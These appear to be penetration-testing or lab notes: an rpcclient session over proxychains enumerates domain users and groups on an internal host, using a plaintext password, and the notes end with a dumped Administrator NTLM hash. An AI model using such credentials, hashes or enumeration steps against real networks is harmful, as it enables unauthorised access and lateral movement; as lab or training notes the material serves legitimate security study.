RPC

proxychains rpcclient -U "joe" --password='Dev0ftheyear!' 172.16.1.200

Domain Users

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[joe] rid:[0x44f]
user:[joe_adm] rid:[0x450]

Domain Groups

rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Workstation Admins] rid:[0x451]

Administrator:500:aad3b435b51404eeaad3b435b51404ee:8f6aaf1438d78c89c4636179e3ae18ea::: aad3b435b51404eeaad3b435b51404ee:8f6aaf1438d78c89c4636179e3ae18ea